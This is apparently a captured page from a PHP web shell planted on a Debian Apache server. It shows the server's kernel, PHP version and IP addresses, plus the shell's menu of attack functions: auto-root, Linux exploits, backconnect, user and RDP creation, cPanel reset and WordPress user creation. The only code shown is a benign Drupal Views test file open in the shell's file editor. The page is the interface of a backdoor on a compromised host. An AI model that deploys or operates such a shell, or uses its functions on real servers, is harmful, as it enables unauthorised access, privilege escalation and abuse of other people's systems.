Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.226.180.158
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
tests /
comment /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_argument_comment...
3.89
KB
-rw-r--r--
views_handler_filter_comment_u...
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_handler_argument_comment_user_uid.test
<?php /** * @file * Definition of viewsHandlerArgumentCommentUserUidTest. */ /** * Tests the argument_comment_user_uid handler. */ class viewsHandlerArgumentCommentUserUidTest extends ViewsSqlTest { public static function getInfo() { return array( 'name' => 'Tests handler argument_comment_user_uid', 'description' => 'Tests the user posted or commented argument handler', 'group' => 'Views Modules', ); } /** * Post comment. * * @param $node * Node to post comment on. * @param $comment * Comment to save */ function postComment($node, $comment = array()) { $comment += array( 'uid' => $this->loggedInUser->uid, 'nid' => $node->nid, 'cid' => '', 'pid' => '', ); return comment_save((object) $comment); } function setUp() { parent::setUp(); // Add two users, create a node with the user1 as author and another node with user2 as author. // For the second node add a comment from user1. $this->account = $this->drupalCreateUser(); $this->account2 = $this->drupalCreateUser(); $this->drupalLogin($this->account); $this->node_user_posted = $this->drupalCreateNode(); $this->node_user_commented = $this->drupalCreateNode(array('uid' => $this->account2->uid)); $this->postComment($this->node_user_commented); } function testCommentUserUidTest() { $view = $this->view_comment_user_uid(); $this->executeView($view, array($this->account->uid)); $resultset = array( array( 'nid' => $this->node_user_posted->nid, ), array( 'nid' => $this->node_user_commented->nid, ), ); $this->column_map = array('nid' => 'nid'); debug($view->result); $this->assertIdenticalResultset($view, $resultset, $this->column_map); } function view_comment_user_uid() { $view = new view; $view->name = 'test_comment_user_uid'; $view->description = ''; $view->tag = 'default'; $view->base_table = 'node'; $view->human_name = 'test_comment_user_uid'; $view->core = 7; $view->api_version = '3.0'; $view->disabled = FALSE; /* Edit this to true to make a default view disabled initially */ /* Display: Master */ $handler = $view->new_display('default', 'Master', 'default'); $handler->display->display_options['access']['type'] = 'perm'; $handler->display->display_options['cache']['type'] = 'none'; $handler->display->display_options['query']['type'] = 'views_query'; $handler->display->display_options['query']['options']['query_comment'] = FALSE; $handler->display->display_options['exposed_form']['type'] = 'basic'; $handler->display->display_options['pager']['type'] = 'full'; $handler->display->display_options['style_plugin'] = 'default'; $handler->display->display_options['row_plugin'] = 'node'; /* Field: Content: nid */ $handler->display->display_options['fields']['nid']['id'] = 'nid'; $handler->display->display_options['fields']['nid']['table'] = 'node'; $handler->display->display_options['fields']['nid']['field'] = 'nid'; /* Contextual filter: Content: User posted or commented */ $handler->display->display_options['arguments']['uid_touch']['id'] = 'uid_touch'; $handler->display->display_options['arguments']['uid_touch']['table'] = 'node'; $handler->display->display_options['arguments']['uid_touch']['field'] = 'uid_touch'; $handler->display->display_options['arguments']['uid_touch']['default_argument_type'] = 'fixed'; $handler->display->display_options['arguments']['uid_touch']['default_argument_skip_url'] = 0; $handler->display->display_options['arguments']['uid_touch']['summary']['number_of_records'] = '0'; $handler->display->display_options['arguments']['uid_touch']['summary']['format'] = 'default_summary'; $handler->display->display_options['arguments']['uid_touch']['summary_options']['items_per_page'] = '25'; return $view; } }
Close